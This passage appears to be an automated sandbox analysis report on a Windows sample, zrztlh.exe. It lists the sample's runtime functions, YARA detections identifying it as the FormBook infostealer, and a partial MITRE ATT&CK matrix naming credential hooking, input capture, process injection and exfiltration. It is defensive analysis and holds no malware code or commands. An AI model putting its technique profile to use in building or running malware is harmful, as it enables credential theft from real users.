___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00EB8FA3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,1_2_00EBE1D4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,_GetPrimaryLen,1_2_00EBE970
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,1_2_00EB8969
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,_GetPrimaryLen,1_2_00EBE970
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00EA4194
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,1_2_00EBEA44
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_00EBE4A4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,1_2_00EB4CB1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: EnumSystemLocalesW,1_2_00EBE448
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,1_2_00EA26FB
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,1_2_00EBE5A4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_00EB9D92
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,1_2_00EB8529
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_00EBE521
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00EB8FA3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,1_2_00EB8529
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,1_2_00EA67B8
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,1_2_00EB9FDB
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00EB8FA3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,1_2_00EBE799
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,1_2_00EBA75F
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00EBE8C3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00EB8FA3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,2_2_00EA1110
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,2_2_00EBE1D4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_00EBE970
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00EB8969
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_00EBE970
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00EA4194
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00EBEA44
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00EBE4A4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,2_2_00EB4CB1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: EnumSystemLocalesW,2_2_00EBE448
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,2_2_00EA26FB
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00EB9D92
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,2_2_00EB8529
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00EBE521
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00EB8FA3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,2_2_00EB8529
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,2_2_00EA67B8
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,2_2_00EB9FDB
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00EB8FA3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00EBE799
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB00A3 cpuid 1_2_00EB00A3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00EB161F

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Native API          		Path Interception512
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts3
          Obfuscated Files or Information          		1
          Input Capture          		1
          System Network Connections Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Input Capture          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Rootkit          		NTDS123
